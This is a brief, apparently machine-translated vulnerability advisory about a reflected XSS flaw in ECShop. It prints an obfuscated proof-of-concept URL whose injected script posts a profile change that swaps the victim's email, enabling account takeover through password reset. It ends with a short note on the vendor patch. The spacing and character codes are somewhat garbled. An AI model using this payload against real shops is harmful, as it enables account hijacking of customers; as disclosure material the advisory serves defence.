Ecshop XSS exploitation and repair of arbitrary User Password Vulnerability

Currently, ecshop has reflected XSS, which can be used. If secondary development has XSS or other CSRF problems, more can be used. (I was slightly affected by this problem)

Use XSS to construct post to submit personal data modification, change it to an operable mailbox, and retrieve the password.

Proof of vulnerability:

Http: // localhost/test/ecshop_gbk272/category. php? Id = 3 & price_min = 0 & price_max = 0 & filter_attr = 0.0.0.199% 22% 3E % 3 Cscript % 3 Eeval % 28String. fromCharCode % 28120,61, 110,101,119, 72,116,116,112, 82,101,113,117,101,115,116, 59,120, 46,111,112,101,110, 112,111,115,116, 34,104,116,116,112, 47,108,111, 108,104,111,115,116, 47,116,101,115,116, 47,101, 99,115,104,111,112, 95,103, 98,107, 117,115,101,114, 46,112,104,112, 59,120, 46,115,101,116, 82,101,113,117,101,115,116, 72,101, 97,100,101,114, 67,111,110,116,101,110,116, 121,112,101, 112,112,108,105, 116,105,111,110, 47,120, 45,119,119,119, 45,102,111,114,109, 45,117,114,108,101,110, 99,111,100,101,100, 59,120, 46,115,101,110,100, 101,100,105,116, 95,112,114,111,102,105,108,101, 38,101,109, 97,105,108, 61,120,120,120, 64, 49, 54,51, 111,109, 59%, 29%, 29%, 3C/script % 3E % 3C % 22

Of course, it is more concise to use the file inclusion method.

Published by the vendor
Filtering is lax and is being fixed.

Patch already released: html "> http://bbs.ecshop.com/thread-137475-1-2.html

: Encode and decode the url to remove unnecessary parameters